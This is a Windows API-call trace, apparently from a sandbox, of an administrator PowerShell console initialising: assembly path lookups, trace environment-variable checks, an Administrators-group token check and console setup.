	[0138.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0138.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0138.264] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0138.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0138.266] CoTaskMemFree (pv=0x1b7da8b0) 
	[0138.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1cd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0138.567] SetErrorMode (uMode=0x1) returned 0x1
	[0138.567] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0138.567] SetErrorMode (uMode=0x1) returned 0x1
	[0139.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0139.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0139.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0139.804] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0139.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.805] CoTaskMemFree (pv=0x1b7da8b0) 
	[0139.809] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0139.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.809] CoTaskMemFree (pv=0x1b7da8b0) 
	[0139.809] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0139.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.809] CoTaskMemFree (pv=0x1b7da8b0) 
	[0139.813] CoCreateGuid (in: pguid=0x1cdac8 | out: pguid=0x1cdac8*(Data1=0xa3e7007f, Data2=0xe5b, Data3=0x4a47, Data4=([0]=0xab, [1]=0xf3, [2]=0xa2, [3]=0x16, [4]=0xa7, [5]=0xb7, [6]=0xd8, [7]=0xe9))) returned 0x0
	[0139.818] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0139.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.818] CoTaskMemFree (pv=0x1b7da8b0) 
	[0139.822] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0139.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.823] CoTaskMemFree (pv=0x1b7da8b0) 
	[0139.919] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0139.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.919] CoTaskMemFree (pv=0x1b7da8b0) 
	[0139.925] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0139.927] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1cd770 | out: lpConsoleScreenBufferInfo=0x1cd770) returned 1
	[0139.933] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0139.933] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1cd770 | out: lpConsoleScreenBufferInfo=0x1cd770) returned 1
	[0139.934] GetVersionExW (in: lpVersionInformation=0x1cd700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cd700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0139.937] GetCurrentProcess () returned 0xffffffffffffffff
	[0139.938] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1cd798 | out: TokenHandle=0x1cd798*=0x33c) returned 1
	[0139.943] GetTokenInformation (in: TokenHandle=0x33c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cd6b8 | out: TokenInformation=0x0, ReturnLength=0x1cd6b8) returned 0
	[0139.944] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3482e0
	[0139.944] GetTokenInformation (in: TokenHandle=0x33c, TokenInformationClass=0x8, TokenInformation=0x3482e0, TokenInformationLength=0x4, ReturnLength=0x1cd6b8 | out: TokenInformation=0x3482e0, ReturnLength=0x1cd6b8) returned 1
	[0139.944] DuplicateTokenEx (in: hExistingToken=0x33c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1cd818 | out: phNewToken=0x1cd818*=0x338) returned 1
	[0139.945] GetTokenInformation (in: TokenHandle=0x33c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cd6b8 | out: TokenInformation=0x0, ReturnLength=0x1cd6b8) returned 0
	[0139.945] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x348310
	[0139.945] GetTokenInformation (in: TokenHandle=0x33c, TokenInformationClass=0x8, TokenInformation=0x348310, TokenInformationLength=0x4, ReturnLength=0x1cd6b8 | out: TokenInformation=0x348310, ReturnLength=0x1cd6b8) returned 1
	[0139.945] CheckTokenMembership (in: TokenHandle=0x338, SidToCheck=0x2df5f80*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1cd828 | out: IsMember=0x1cd828) returned 1
	[0139.945] CloseHandle (hObject=0x338) returned 1
	[0139.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0139.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0139.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0139.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.093] CoTaskMemAlloc (cb=0x804) returned 0x1b7e4e60
	[0140.093] GetConsoleTitleW (in: lpConsoleTitle=0x1b7e4e60, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0140.198] CoTaskMemFree (pv=0x1b7e4e60) 
	[0140.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0140.832] SetConsoleCtrlHandler (HandlerRoutine=0x2a668dc, Add=1) returned 1
	[0140.843] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0140.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0140.843] CoTaskMemFree (pv=0x1b7da8b0) 
	[0140.855] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0140.857] CoCreateGuid (in: pguid=0x1cd910 | out: pguid=0x1cd910*(Data1=0x1e1d405, Data2=0xfaf5, Data3=0x4c21, Data4=([0]=0xac, [1]=0xf8, [2]=0xa4, [3]=0xd7, [4]=0xc4, [5]=0xbe, [6]=0x2e, [7]=0xdb))) returned 0x0
	[0140.858] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0140.858] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0140.858] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.026] WinSqmIsOptedIn () returned 0x0
	[0141.027] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.027] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.028] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.028] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.028] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.028] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.029] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.029] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.030] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.030] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.032] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.032] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.032] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.032] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.033] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.033] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.043] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.043] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.234] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.234] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.234] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.236] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.236] CoTaskMemFree (pv=0x1b7da8b0) 
	[0141.236] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0141.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0141.236] CoTaskMemFree (pv=0x1b7da8b0) 
	[0142.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
